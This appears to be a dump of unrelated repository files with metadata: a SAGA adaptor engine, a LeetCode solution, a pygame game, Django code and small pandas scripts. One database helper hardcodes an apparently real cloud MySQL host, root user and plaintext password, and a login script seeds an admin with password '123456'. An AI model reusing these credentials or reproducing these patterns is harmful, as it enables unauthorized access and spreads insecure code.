file = open("times.csv", "r")
r = file.read()
file.close()
m = r.split("\n")
s = "\n".join(m[:-2]) + "\n" # remove last 2 lines (last line is \n)
if len(s) == 1:
s = ""
file = open("times.csv", "w+")
for i in range(len(s)):
file.write(s[i])
file.close()
|
[
"max.poppe@ugent.be"
] |
max.poppe@ugent.be
|
ba527a5399515881d5b2223c59c62dcee6f8eaed
|
e5ac5f718df4c3c90c02a6275b9e690dffceeaa5
|
/saga/engine/engine.py
|
49f323a398538036945e9849e77d19d1bb641ae3
|
[
"Apache-2.0"
] |
permissive
|
virthead/COMPASS-pilot
|
5cbd83b542d3c1a5ba078c6ac19f133093c86383
|
131fa454de3b5378622c6a176930cfc5b3e58267
|
refs/heads/master
| 2020-03-26T08:14:06.068259
| 2018-12-04T11:24:42
| 2018-12-04T11:24:42
| 144,692,491
| 0
| 1
|
Apache-2.0
| 2018-11-13T08:43:43
| 2018-08-14T08:37:45
|
Python
|
UTF-8
|
Python
| false
| false
| 24,143
|
py
|
__author__ = "Andre Merzky, Ole Weidner"
__copyright__ = "Copyright 2012-2013, The SAGA Project"
__license__ = "MIT"
""" Provides the SAGA runtime. """
import re
import sys
import pprint
import string
import inspect
import radical.utils as ru
import radical.utils.config as ruc
import radical.utils.logger as rul
import saga.exceptions as se
import saga.engine.registry # adaptors to load
############# These are all supported options for saga.engine ####################
##
_config_options = [
{
'category' : 'saga.engine',
'name' : 'load_beta_adaptors',
'type' : bool,
'default' : False,
'valid_options' : [True, False],
'documentation' : 'load adaptors which are marked as beta (i.e. not released).',
'env_variable' : None
},
# FIXME: is there a better place to register util level options?
{
'category' : 'saga.utils.pty',
'name' : 'prompt_pattern',
'type' : str,
'default' : '[\$#%>\]]\s*$',
'documentation' : 'use this regex to detect shell prompts',
'env_variable' : None
},
{
'category' : 'saga.utils.pty',
'name' : 'ssh_copy_mode',
'type' : str,
'default' : 'sftp',
'valid_options' : ['sftp', 'scp', 'rsync+ssh', 'rsync'],
'documentation' : 'use the specified protocol for pty level file transfer',
'env_variable' : 'SAGA_PTY_SSH_COPYMODE'
},
{
'category' : 'saga.utils.pty',
'name' : 'connection_pool_ttl',
'type' : int,
'default' : 10*60,
'documentation' : 'minimum time a connection is kept alive in a connection pool',
'env_variable' : 'SAGA_PTY_CONN_POOL_TTL'
},
{
'category' : 'saga.utils.pty',
'name' : 'connection_pool_size',
'type' : int,
'default' : 10,
'documentation' : 'maximum number of connections kept in a connection pool',
'env_variable' : 'SAGA_PTY_CONN_POOL_SIZE'
},
{
'category' : 'saga.utils.pty',
'name' : 'connection_pool_wait',
'type' : int,
'default' : 10*60,
'documentation' : 'maximum number of seconds to wait for any connection in the connection pool to become available before raising a timeout error',
'env_variable' : 'SAGA_PTY_CONN_POOL_WAIT'
}
]
################################################################################
##
class Engine(ruc.Configurable):
""" Represents the SAGA engine runtime system.
The Engine is a singleton class that takes care of adaptor
loading and management, and which binds adaptor instances to
API object instances. The Engine singleton is implicitly
instantiated as soon as SAGA is imported into Python. It
will, on creation, load all available adaptors. Adaptors
modules MUST provide an 'Adaptor' class, which will register
the adaptor in the engine with information like these
(simplified)::
_ADAPTOR_INFO = {
'name' : _adaptor_name,
'version' : 'v1.3'
'schemas' : ['fork', 'local']
'cpis' : [{
'type' : 'saga.job.Job',
'class' : 'LocalJob',
},
{
'type' : 'saga.job.Service',
'class' : 'LocalJobService',
}
]
}
where 'class' points to the actual adaptor classes, and
'schemas' lists the URL schemas for which those adaptor
classes should be considered. Note that schemas are case
insensitive. More details on the adaptor registration process
and on adaptor meta data can be found in the adaptors writer
guide.
:todo: add link to adaptor writers documentation.
While loading adaptors, the Engine builds up an internal
registry of adaptor classes, hierarchically sorted like this
(simplified)::
_adaptor_registry =
{
'job' :
{
'gram' : [<gram job adaptor, gram job adaptor class>]
'ssh' : [<ssh job adaptor, ssh job adaptor class>]
'http' : [<aws job adaptor, aws job adaptor class>,
<occi job adaptor, occi job adaptor class>]
...
},
'file' :
{
'ftp' : <ftp file adaptor, ftp file adaptor class>
'scp' : <scp file adaptor, scp file adaptor class>
...
},
...
}
to enable simple lookup operations when binding an API object
to an adaptor class instance. For example, a
'saga.job.Service('http://remote.host.net/')' constructor
would use (simplified)::
def __init__ (self, url="", session=None) :
for (adaptor, adaptor_class) in self._engine._adaptor_registry{'job'}{url.scheme}
try :
self._adaptor = adaptor_class (self, url, session}
except saga.Exception e :
# adaptor bailed out
continue
else :
# successfully bound to adaptor
return
"""
__metaclass__ = ru.Singleton
#-----------------------------------------------------------------
#
def __init__(self):
# Engine manages cpis from adaptors
self._adaptor_registry = {}
# set the configuration options for this object
ruc.Configurable.__init__ (self, 'saga')
ruc.Configurable.config_options (self, 'saga.engine', _config_options)
self._cfg = self.get_config('saga.engine')
# Initialize the logging, and log version (this is a singleton!)
self._logger = rul.getLogger ('saga', 'Engine')
# load adaptors
self._load_adaptors ()
#-----------------------------------------------------------------
#
def _load_adaptors (self, inject_registry=None):
""" Try to load all adaptors that are registered in
saga.engine.registry.py. This method is called from the
constructor. As Engine is a singleton, this method is
called once after the module is first loaded in any python
application.
:param inject_registry: Inject a fake registry. *For unit tests only*.
"""
# get the engine config options
global_config = ruc.getConfig('saga')
# get the list of adaptors to load
registry = saga.engine.registry.adaptor_registry
# check if some unit test wants to use a special registry. If
# so, we reset cpi infos from the earlier singleton creation.
if inject_registry != None :
self._adaptor_registry = {}
registry = inject_registry
# attempt to load all registered modules
for module_name in registry:
self._logger.info ("Loading adaptor %s" % module_name)
# first, import the module
adaptor_module = None
try :
adaptor_module = __import__ (module_name, fromlist=['Adaptor'])
except Exception as e:
self._logger.warn ("Skipping adaptor %s 1: module loading failed: %s" % (module_name, e))
continue # skip to next adaptor
# we expect the module to have an 'Adaptor' class
# implemented, which, on calling 'register()', returns
# a info dict for all implemented adaptor classes.
adaptor_instance = None
adaptor_info = None
try:
adaptor_instance = adaptor_module.Adaptor ()
adaptor_info = adaptor_instance.register ()
except se.SagaException as e:
self._logger.warn ("Skipping adaptor %s: loading failed: '%s'" % (module_name, e))
continue # skip to next adaptor
except Exception as e:
self._logger.warn ("Skipping adaptor %s: loading failed: '%s'" % (module_name, e))
continue # skip to next adaptor
# the adaptor must also provide a sanity_check() method, which sould
# be used to confirm that the adaptor can function properly in the
# current runtime environment (e.g., that all pre-requisites and
# system dependencies are met).
try:
adaptor_instance.sanity_check ()
except Exception as e:
self._logger.warn ("Skipping adaptor %s: failed self test: %s" % (module_name, e))
continue # skip to next adaptor
# check if we have a valid adaptor_info
if adaptor_info is None :
self._logger.warning ("Skipping adaptor %s: adaptor meta data are invalid" \
% module_name)
continue # skip to next adaptor
if not 'name' in adaptor_info or \
not 'cpis' in adaptor_info or \
not 'version' in adaptor_info or \
not 'schemas' in adaptor_info :
self._logger.warning ("Skipping adaptor %s: adaptor meta data are incomplete" \
% module_name)
continue # skip to next adaptor
adaptor_name = adaptor_info['name']
adaptor_version = adaptor_info['version']
adaptor_schemas = adaptor_info['schemas']
adaptor_enabled = True # default unless disabled by 'enabled' option or version filer
# disable adaptors in 'alpha' or 'beta' versions -- unless
# the 'load_beta_adaptors' config option is set to True
if not self._cfg['load_beta_adaptors'].get_value () :
if 'alpha' in adaptor_version.lower() or \
'beta' in adaptor_version.lower() :
self._logger.warn ("Skipping adaptor %s: beta versions are disabled (%s)" \
% (module_name, adaptor_version))
continue # skip to next adaptor
# get the 'enabled' option in the adaptor's config
# section (saga.cpi.base ensures that the option exists,
# if it is initialized correctly in the adaptor class.
adaptor_config = None
adaptor_enabled = False
try :
adaptor_config = global_config.get_category (adaptor_name)
adaptor_enabled = adaptor_config['enabled'].get_value ()
except se.SagaException as e:
self._logger.warn ("Skipping adaptor %s: initialization failed: %s" % (module_name, e))
continue # skip to next adaptor
except Exception as e:
self._logger.warn ("Skipping adaptor %s: initialization failed: %s" % (module_name, e))
continue # skip to next adaptor
# only load adaptor if it is not disabled via config files
if adaptor_enabled == False :
self._logger.info ("Skipping adaptor %s: 'enabled' set to False" \
% (module_name))
continue # skip to next adaptor
# check if the adaptor has anything to register
if 0 == len (adaptor_info['cpis']) :
self._logger.warn ("Skipping adaptor %s: does not register any cpis" \
% (module_name))
continue # skip to next adaptor
# we got an enabled adaptor with valid info - yay! We can
# now register all adaptor classes (cpi implementations).
for cpi_info in adaptor_info['cpis'] :
# check cpi information details for completeness
if not 'type' in cpi_info or \
not 'class' in cpi_info :
self._logger.info ("Skipping adaptor %s cpi: cpi info detail is incomplete" \
% (module_name))
continue # skip to next cpi info
# adaptor classes are registered for specific API types.
cpi_type = cpi_info['type']
cpi_cname = cpi_info['class']
cpi_class = None
try :
cpi_class = getattr (adaptor_module, cpi_cname)
except Exception as e:
# this exception likely means that the adaptor does
# not call the saga.adaptors.Base initializer (correctly)
self._logger.warning ("Skipping adaptor %s: adaptor class invalid %s: %s" \
% (module_name, cpi_info['class'], str(e)))
continue # skip to next adaptor
# make sure the cpi class is a valid cpi for the given type.
# We walk through the list of known modules, and try to find
# a modules which could have that class. We do the following
# tests:
#
# cpi_class: ShellJobService
# cpi_type: saga.job.Service
# modules: saga.adaptors.cpi.job
# modules: saga.adaptors.cpi.job.service
# classes: saga.adaptors.cpi.job.Service
# classes: saga.adaptors.cpi.job.service.Service
#
# cpi_class: X509Context
# cpi_type: saga.Context
# modules: saga.adaptors.cpi.context
# classes: saga.adaptors.cpi.context.Context
#
# So, we add a 'adaptors.cpi' after the 'saga' namespace
# element, then append the rest of the given namespace. If that
# gives a module which has the requested class, fine -- if not,
# we add a lower cased version of the class name as last
# namespace element, and check again.
# -> saga . job . Service
# <- ['saga', 'job', 'Service']
cpi_type_nselems = cpi_type.split ('.')
if len(cpi_type_nselems) < 2 or \
len(cpi_type_nselems) > 3 :
self._logger.warn ("Skipping adaptor %s: cpi type not valid: '%s'" \
% (module_name, cpi_type))
continue # skip to next cpi info
if cpi_type_nselems[0] != 'saga' :
self._logger.warn ("Skipping adaptor %s: cpi namespace not valid: '%s'" \
% (module_name, cpi_type))
continue # skip to next cpi info
# -> ['saga', 'job', 'Service']
# <- ['saga', 'adaptors', 'cpi', 'job', 'Service']
cpi_type_nselems.insert (1, 'adaptors')
cpi_type_nselems.insert (2, 'cpi')
# -> ['saga', 'adaptors', 'cpi', 'job', 'Service']
# <- ['saga', 'adaptors', 'cpi', 'job'], 'Service'
cpi_type_cname = cpi_type_nselems.pop ()
# -> ['saga', 'adaptors', 'cpi', 'job'], 'Service'
# <- 'saga.adaptors.cpi.job
# <- 'saga.adaptors.cpi.job.service
cpi_type_modname_1 = '.'.join (cpi_type_nselems)
cpi_type_modname_2 = '.'.join (cpi_type_nselems + [cpi_type_cname.lower()])
# does either module exist?
cpi_type_modname = None
if cpi_type_modname_1 in sys.modules :
cpi_type_modname = cpi_type_modname_1
if cpi_type_modname_2 in sys.modules :
cpi_type_modname = cpi_type_modname_2
if not cpi_type_modname :
self._logger.warn ("Skipping adaptor %s: cpi type not known: '%s'" \
% (module_name, cpi_type))
continue # skip to next cpi info
# so, make sure the given cpi is actually
# implemented by the adaptor class
cpi_ok = False
for name, cpi_obj in inspect.getmembers (sys.modules[cpi_type_modname]) :
if name == cpi_type_cname and \
inspect.isclass (cpi_obj) :
if issubclass (cpi_class, cpi_obj) :
cpi_ok = True
if not cpi_ok :
self._logger.warn ("Skipping adaptor %s: doesn't implement cpi '%s (%s)'" \
% (module_name, cpi_class, cpi_type))
continue # skip to next cpi info
# finally, register the cpi for all its schemas!
registered_schemas = list()
for adaptor_schema in adaptor_schemas:
adaptor_schema = adaptor_schema.lower ()
# make sure we can register that cpi type
if not cpi_type in self._adaptor_registry :
self._adaptor_registry[cpi_type] = {}
# make sure we can register that schema
if not adaptor_schema in self._adaptor_registry[cpi_type] :
self._adaptor_registry[cpi_type][adaptor_schema] = []
# we register the cpi class, so that we can create
# instances as needed, and the adaptor instance,
# as that is passed to the cpi class c'tor later
# on (the adaptor instance is used to share state
# between cpi instances, amongst others)
info = {'cpi_cname' : cpi_cname,
'cpi_class' : cpi_class,
'adaptor_name' : adaptor_name,
'adaptor_instance' : adaptor_instance}
# make sure this tuple was not registered, yet
if info in self._adaptor_registry[cpi_type][adaptor_schema] :
self._logger.warn ("Skipping adaptor %s: already registered '%s - %s'" \
% (module_name, cpi_class, adaptor_instance))
continue # skip to next cpi info
self._adaptor_registry[cpi_type][adaptor_schema].append(info)
registered_schemas.append(str("%s://" % adaptor_schema))
self._logger.info("Register adaptor %s for %s API with URL scheme(s) %s" %
(module_name,
cpi_type,
registered_schemas))
#-----------------------------------------------------------------
#
def find_adaptors (self, ctype, schema) :
''' Look for a suitable cpi class serving a particular schema
This method will sift through our adaptor registry (see
'_load_adaptors()', and dig for any adaptor which marches the given
api class type and schema. All matching adaptors are returned (by
name)
'''
if not ctype in self._adaptor_registry :
return []
if not schema.lower () in self._adaptor_registry[ctype] :
return []
adaptor_names = []
for info in self._adaptor_registry[ctype][schema.lower ()] :
adaptor_names.append (info['adaptor_name'])
return adaptor_names
#-----------------------------------------------------------------
#
def get_adaptor (self, adaptor_name) :
''' Return the adaptor module's ``Adaptor`` class for the given adaptor
name.
This method is used if adaptor or API object implementation need to
interact with other adaptors.
'''
for ctype in self._adaptor_registry.keys () :
for schema in self._adaptor_registry[ctype].keys () :
for info in self._adaptor_registry[ctype][schema] :
if ( info['adaptor_name'] == adaptor_name ) :
return info['adaptor_instance']
error_msg = "No adaptor named '%s' found" % adaptor_name
self._logger.error(error_msg)
raise se.NoSuccess(error_msg)
#-----------------------------------------------------------------
#
def bind_adaptor (self, api_instance, ctype, schema,
preferred_adaptor, *args, **kwargs) :
'''
Look for a suitable adaptor class to bind to, instantiate it, and
initialize it.
If 'preferred_adaptor' is not 'None', only that given adaptors is
considered, and adaptor classes are only created from that specific
adaptor.
'''
if not ctype in self._adaptor_registry:
error_msg = "No adaptor found for '%s' and URL scheme %s://" \
% (ctype, schema)
self._logger.error(error_msg)
raise se.NotImplemented(error_msg)
if not schema in self._adaptor_registry[ctype]:
error_msg = "No adaptor found for '%s' and URL scheme %s://" \
% (ctype, schema)
self._logger.error(error_msg)
raise se.NotImplemented(error_msg)
# cycle through all applicable adaptors, and try to instantiate
# a matching one.
exception = saga.NoSuccess ("binding adaptor failed", api_instance)
for info in self._adaptor_registry[ctype][schema] :
cpi_cname = info['cpi_cname']
cpi_class = info['cpi_class']
adaptor_name = info['adaptor_name']
adaptor_instance = info['adaptor_instance']
try :
# is this adaptor acceptable?
if preferred_adaptor != None and \
preferred_adaptor != adaptor_instance :
# ignore this adaptor
self._logger.debug ("bind_adaptor for %s : %s != %s - ignore adaptor" \
% (cpi_cname, preferred_adaptor, adaptor_instance))
continue
# instantiate cpi
cpi_instance = cpi_class (api_instance, adaptor_instance)
# self._logger.debug("Successfully bound %s.%s to %s" \
# % (adaptor_name, cpi_cname, api_instance))
return cpi_instance
except se.SagaException as e :
# adaptor class initialization failed - try next one
exception._add_exception (e)
self._logger.info ("bind_adaptor adaptor class ctor failed : %s.%s: %s" \
% (adaptor_name, cpi_class, str(e)))
continue
except Exception as e :
exception._add_exception (saga.NoSuccess (str(e), api_instance))
self._logger.info ("bind_adaptor adaptor class ctor failed : %s.%s: %s" \
% (adaptor_name, cpi_class, str(e)))
continue
self._logger.error ("No suitable adaptor found for '%s' and URL scheme '%s'" % (ctype, schema))
self._logger.info ("%s" % (str(exception)))
raise exception._get_exception_stack ()
#-----------------------------------------------------------------
#
def loaded_adaptors (self):
return self._adaptor_registry
#-----------------------------------------------------------------
#
def _dump (self) :
import pprint
pprint.pprint (self._adaptor_registry)
|
[
"virthead@pandawms.jinr.ru"
] |
virthead@pandawms.jinr.ru
|
0790885d07748510ba3469b18c3485786ca2c678
|
c0d489046bc114672139873916a118a203c6f850
|
/Medium/93. Restore IP Addresses.py
|
94ed17c1daab3e46ce78aa9e4f44a4152abf96d2
|
[] |
no_license
|
shifty049/LeetCode_Practice
|
165ada14a8fd436e9068bd94d6b82b1ed312013c
|
ca8be179282be86450c9959fb239466d152a55e5
|
refs/heads/master
| 2022-05-25T16:23:05.736852
| 2022-03-29T13:48:21
| 2022-03-29T13:48:21
| 249,737,622
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,024
|
py
|
class Solution:
def restoreIpAddresses(self, s: str) -> List[str]:
lst = []
length = len(s)
def backtracking(num, count, sub_lst):
if len(sub_lst)>1 and (int(s[sub_lst[-2]:sub_lst[-1]]) > 255 or (s[sub_lst[-2]] == '0' and len(s[sub_lst[-2]:sub_lst[-1]])>1)):
return
if num >= length or count >= 4:
if count == 4 and num==length:
if sub_lst not in lst:
lst.append('.'.join([s[i:sub_lst[ix+1]] for ix,i in enumerate(sub_lst[:-1])]))
return
for i in range(1, length - num - 2 + count ):
backtracking(num+i, count+1, sub_lst+[sub_lst[-1]+i])
backtracking(0 , 0, [0])
return lst
#Runtime: 148 ms, faster than 8.99% of Python3 online submissions for Restore IP Addresses.
#Memory Usage: 14.4 MB, less than 7.55% of Python3 online submissions for Restore IP Addresses.
#Fu-Ti, Hsu
#shifty049@gmail.com
|
[
"shifty049@gmail.com"
] |
shifty049@gmail.com
|
152a39c5f6f25998206bbb4444fc935c598143eb
|
561513a9927f351720616f7a66556e2bdcb89346
|
/request.py
|
28fadfb2b460f81b686694fc330d9a2acece2186
|
[] |
no_license
|
CNllb/Hokkien_DataBases
|
511544abdff94ada1813f4ee6299034e6368cfd3
|
021df946f5441538d53d7170240dd281b9ac86ba
|
refs/heads/main
| 2023-09-05T22:15:09.793737
| 2021-11-24T10:30:41
| 2021-11-24T10:30:41
| 425,679,947
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 439
|
py
|
import pymysql
def link_to_database():
conn = pymysql.connect(
host="gz-cynosdbmysql-grp-56sj4bjz.sql.tencentcdb.com",
user="root",
port=25438,
password="Lcx010327",
database="Hokkien");
# 创建游标
cursor = conn.cursor();
sql = ""
try:
cursor.execute(sql)
cursor.close()
conn.close()
except:
print("Error: unable to fetchall userPrefer")
|
[
"1360602885@qq.com"
] |
1360602885@qq.com
|
9b45c38f51e416a27227fa1c503c2124840c9bfa
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/ZeeWN5NdFa8ALJq5G_16.py
|
003fc3b30954c00178f5a2acaa2c8646fd3bff48
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213
| 2021-04-06T20:17:44
| 2021-04-06T20:17:44
| 355,318,759
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 154
|
py
|
def nearest_chapter(ch, p):
out = sorted(ch.keys(), key = lambda x: ch[x], reverse = True)
out.sort(key = lambda x: abs(ch[x] - p))
return out[0]
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
95de42864a1816e62e897dbcecdc4d73c21b66c6
|
f8ae676c657638dac835c437a443767431de2d60
|
/News/migrations/0009_alter_news_text.py
|
4f54d36fb68bacd4c52082e396d4cc11788fcbd6
|
[] |
no_license
|
OR6107/150th-kaiseifes-backend
|
0dc03b1c91b86b2333100d0ea5097654e26409a8
|
9b9429443a834c5dd78a3904ad52ee03e73f4fac
|
refs/heads/main
| 2023-06-17T14:09:42.315863
| 2021-07-18T03:52:10
| 2021-07-18T03:52:10
| 378,079,752
| 0
| 0
| null | 2021-06-18T08:09:02
| 2021-06-18T08:09:02
| null |
UTF-8
|
Python
| false
| false
| 363
|
py
|
# Generated by Django 3.2.4 on 2021-07-02 10:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('News', '0008_alter_news_text'),
]
operations = [
migrations.AlterField(
model_name='news',
name='text',
field=models.TextField(),
),
]
|
[
"keigo0827511@gmail.com"
] |
keigo0827511@gmail.com
|
a9233691883537261c42a589490d45807bd1e36c
|
8d63c58eae36070409f05192a2f2366092cfb482
|
/game_util.py
|
64734893a08a661f036e0a145c6e944bee27f4e6
|
[
"MIT"
] |
permissive
|
Quazyrog/kopernik-python
|
f8d97bfddcbff97a367e0af808d6fffb0092fce6
|
202fdd5d0321960904d473d986c172e56dd62a03
|
refs/heads/master
| 2020-08-02T06:21:15.172240
| 2019-09-27T12:23:33
| 2019-09-27T12:23:33
| 211,261,190
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,625
|
py
|
import pygame
import pytmx
from pygame.sprite import Group, Sprite, spritecollideany
from pygame.math import Vector2
from pytmx import TiledTileLayer, TiledObject
SCREEN_SIZE = (1366, 768)
ASSETS_DIR = "./Assets"
class Game:
def __init__(self):
self.running = False
self.screen = None
self.player = None
self.level = None
self.player_movement = Vector2(0, 0)
def start(self) -> None:
self.initialize()
self.running = True
t0 = pygame.time.get_ticks()
while self.running:
self.handle_events()
t1 = pygame.time.get_ticks()
self.update((t1 - t0) / 1000)
self.render()
t0 = t1
def initialize(self) -> None:
pygame.init()
self.screen = pygame.display.set_mode(SCREEN_SIZE)
def handle_events(self) -> None:
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.running = False
elif event.type == pygame.KEYDOWN or event.type == pygame.KEYUP:
sgn = 1 if event.type == pygame.KEYDOWN else -1
change = Vector2(0 ,0)
if pygame.K_UP == event.key:
change.y = -sgn
elif pygame.K_DOWN == event.key:
change.y = sgn
elif pygame.K_LEFT == event.key:
change.x = -sgn
elif pygame.K_RIGHT == event.key:
change.x = sgn
elif pygame.K_SPACE == event.key and event.type == pygame.KEYUP:
sprite = pygame.sprite.spritecollideany(self.player, self.level.interactions, False)
if sprite is None:
return
interacted = sprite.map_object
self.level.activate_object(interacted)
self.player_movement += change
self.player.move(self.player_movement)
def update(self, time_delta: float) -> None:
self.player.update(time_delta)
def render_tiles_layer(self, layer: TiledTileLayer, offset: Vector2) -> None:
for x, y, image in layer.tiles():
pos_x = offset[0] + x * self.level.tile_size
pos_y = offset[1] + y * self.level.tile_size
self.screen.blit(image, (pos_x, pos_y))
def render_objects_layer(self, layer: TiledTileLayer, offset: Vector2) -> None:
for obj in layer:
print(obj, obj.image)
if obj.image:
self.screen.blit(obj.image, (obj.x + offset.x, obj.y + offset.y))
def render(self) -> None:
offset = Vector2()
offset.x = (SCREEN_SIZE[0] - self.level.map_data.width * self.level.tile_size) // 2
offset.y = (SCREEN_SIZE[1] - self.level.map_data.height * self.level.tile_size) // 2
self.screen.fill((0, 0, 0))
for layer in self.level.map_data.visible_tile_layers:
self.render_tiles_layer(self.level.map_data.layers[layer], offset)
for layer in self.level.map_data.visible_object_groups:
self.render_objects_layer(self.level.map_data.layers[layer], offset)
self.screen.blit(self.player.image, self.player.rect.move(offset.x, offset.y))
pygame.display.flip()
class Level:
def __init__(self, name: str, game: Game):
self.map_data = pytmx.load_pygame("%s/%s.tmx" % (ASSETS_DIR, name))
self.colliders = pygame.sprite.Group()
self.interactions = pygame.sprite.Group()
self.triggers = pygame.sprite.Group()
self.game = game
self.player = None
self.tile_size = self.map_data.tilewidth
self.bounds = pygame.Rect(0, 0, self.tile_size * self.map_data.width, self.tile_size * self.map_data.height)
self.name = name
assert self.map_data.tilewidth == self.map_data.tileheight
for group in self.map_data.objectgroups:
if group.name == "Collision":
for obj in group:
self.colliders.add(MapObject(obj))
if group.name == "Interaction":
for obj in group:
self.interactions.add(MapObject(obj))
if group.name == "Trigger":
for obj in group:
self.triggers.add(MapObject(obj))
def set_player(self, player: "Player", on_spawn : bool) -> None:
self.player = player
player.level = self
if not on_spawn:
return
try:
spawn = self.map_data.get_object_by_name("Spawn")
player.position = Vector2(spawn.x, spawn.y)
except ValueError:
pass
def activate_object(self, obj : TiledObject) -> None:
print(obj)
class MapObject(pygame.sprite.Sprite):
def __init__(self, obj_data):
super().__init__()
self.rect = (obj_data.x, obj_data.y, obj_data.width, obj_data.height)
self.map_object = obj_data
class Player(pygame.sprite.Sprite):
def __init__(self):
super().__init__()
self.level = None
self.image = pygame.image.load("%s/Player.png" % ASSETS_DIR)
self.rect = pygame.Rect(0, 0, self.image.get_width(), self.image.get_height())
self._position = Vector2(0, 0)
self._speed = Vector2(0, 0)
self.velocity = 2
self._triggered = set()
def move(self, direction: Vector2):
try:
self._speed = direction.normalize() * self.velocity * self.level.tile_size
except ValueError:
self._speed = Vector2(0, 0)
@property
def position(self) -> Vector2:
return self._position
@position.setter
def position(self, value: Vector2) -> None:
self._position = value
self.rect = pygame.Rect(value.x, value.y, self.rect.width, self.rect.height)
def update(self, time_delta: float):
if self._speed.length() == 0:
return
before = self.rect
mov = self._speed * time_delta
self.rect = pygame.Rect(self.position.x + mov.x, self.position.y + mov.y, before.width, before.height)
if spritecollideany(self, self.level.colliders, False) is None and self.level.bounds.contains(self.rect):
self._position += mov
s = set()
for obj in pygame.sprite.spritecollide(self, self.level.interactions, False):
s.add(obj.map_object)
for obj in s:
if obj not in self._triggered:
self.level.activate_object(obj)
self._triggered = s
else:
self.rect = before
|
[
"wm382710@students.mimuw.edu.pl"
] |
wm382710@students.mimuw.edu.pl
|
cc556a21ebb4a3a1da3604521e71f01202a5fcc2
|
87915f5d46d1b776b824bfb4d4e4382e02cf3835
|
/Kiasati_final/runner.py
|
333c686367ed1c2db81db0e5776ee4c40d5d438b
|
[] |
no_license
|
hamrazkiasati/sosgame
|
e70f888ac2a30956c817de0cabbc69c7d357ab15
|
d9b3195160978385fdb8f543816885c724020dd5
|
refs/heads/master
| 2022-12-03T04:12:18.066844
| 2020-08-07T19:18:31
| 2020-08-07T19:18:31
| 285,903,772
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 889
|
py
|
import sqlite3
from base import win
from tkinter import ttk
from login import opensignin, opensignup
with sqlite3.connect('users.db') as db:
cursor = db.cursor()
cursor.execute("""CREATE TABLE IF NOT EXISTS
users
(username TEXT NOT NULL PRIMARY KEY,
password TEXT NOT NULL,
first TEXT NOT NULL,
last TEXT NOT NULL,
games INTEGER,
wins INTEGER,
isAdmin Boolean
);""")
cursor.execute("select * from users where username = 'admin' ")
isFirst = cursor.fetchone()
if isFirst is None:
cursor.execute("INSERT INTO users VALUES('admin','123456','Hamraaz','Kiasati','0','0',true)")
db.commit()
db.close()
btn_login = ttk.Button(win, text='Sign in', command=opensignin)
btn_login.place(relx=0.3, rely=0.3)
btn_signup = ttk.Button(win, text='Sign up', command=opensignup)
btn_signup.place(relx=0.3, rely=0.6)
win.mainloop()
|
[
"noreply@github.com"
] |
hamrazkiasati.noreply@github.com
|
447eaf5574e069bc15b07fe9d3e0afec6844b381
|
d2aa30899042e9f4755700850839dd1df38a723f
|
/cutcsv.py
|
d5e52b6210226a723feff4c3990b343b639ce131
|
[] |
no_license
|
DhvanilVadher/Intrusion-Detection-System-using-ANN.
|
40edcfd9b3fb588fdbdd40e447813cb99acc5bad
|
ab3149af97826e2e7b81cd424b4af18acfe7e5ef
|
refs/heads/main
| 2023-04-13T02:58:42.725005
| 2021-04-23T15:18:42
| 2021-04-23T15:18:42
| 345,471,806
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 375
|
py
|
import pandas as pd
f=pd.read_csv("./editcsv/FridayDDOS.csv")
keep_col = [' Average Packet Size','Active Mean',' Active Min',' Flow IAT Mean',' Flow Duration',' Fwd Packet Length Mean','Total Length of Fwd Packets',' Subflow Fwd Bytes',' Bwd IAT Mean',' Bwd Packet Length Std',' Bwd Packet Length Min',' Label']
new_f = f[keep_col]
new_f.to_csv("FridayCUT.csv", index=False)
|
[
""
] | |
d193039a18ab69a521087eba5cafe9748b85bddd
|
8543d0f9dc3afe9b1f94701905168afd0f683da2
|
/Django/Latest_MMM/Web/views.py
|
7ca2c0416af53e10cdfa63e01c4989db95774e21
|
[] |
no_license
|
kasunsampathhewage/test_v1
|
da1b18ca27e0879411d4d81270a1034157e6d0cf
|
40a1182650eb9fd0bda6b2ad7ead047a202d3eae
|
refs/heads/master
| 2023-02-08T03:16:57.965921
| 2020-12-26T08:49:18
| 2020-12-26T08:49:18
| 323,825,702
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 51,671
|
py
|
from django.shortcuts import render
from django.http import HttpResponse
from django.http import JsonResponse
import pandas as pd
import numpy as np
from datetime import datetime
from sorted_months_weekdays import *
from sort_dataframeby_monthorweek import *
from .models import *
import calendar
from .predict import *
# Create your views here.
def indexpage(request):
years = cd_year()
months = cd_month()
bigcs = cd_bigc()
#get values from filter
yearf = request.POST.get('year')
monthf = request.POST.get('month')
bigcf = request.POST.get('bigc')
# filter data frame
if request.method == "POST":
df = SummarydataframeCreation()
df1 = df[(df.bigc == bigcf)&(df.year == yearf)]
df1_1 = df[(df.bigc == bigcf)&(df.year == yearf)&(df.month == monthf)]
else:
df = SummarydataframeCreation()
df = df.sort_values(by='date')
a = df['year'].iloc[-1]
b = df['month'].iloc[-1]
df1 = df[(df.year == a)]
df1_1 = df[(df.year == a)&(df.month == b)]
# Monthly sales chart1
df2 = df1.groupby('month', as_index=False).agg({"Sales": "sum"})
df2 = Sort_Dataframeby_Month(df=df2, monthcolumnname='month')
Sale_Date = df2['month'].values.tolist()
Sale_Amount = df2['Sales'].values.tolist()
# monthly investment chart2
df4 = df1[['month', 'date', 'Consumer_Promotion', 'AandP', 'Trade_Promotion', 'JBP', 'Distributor_Margins',
'Loyalty_Schemes', 'Other', 'Video', 'Search_Only', 'Display_Only', 'facebook', 'instagram', 'messenger']]
df4 = pd.melt(df4, id_vars=['date', 'month'], var_name='Investment_Types', value_name='value')
df4 = df4.groupby(['month','date'])['value'].sum().reset_index()
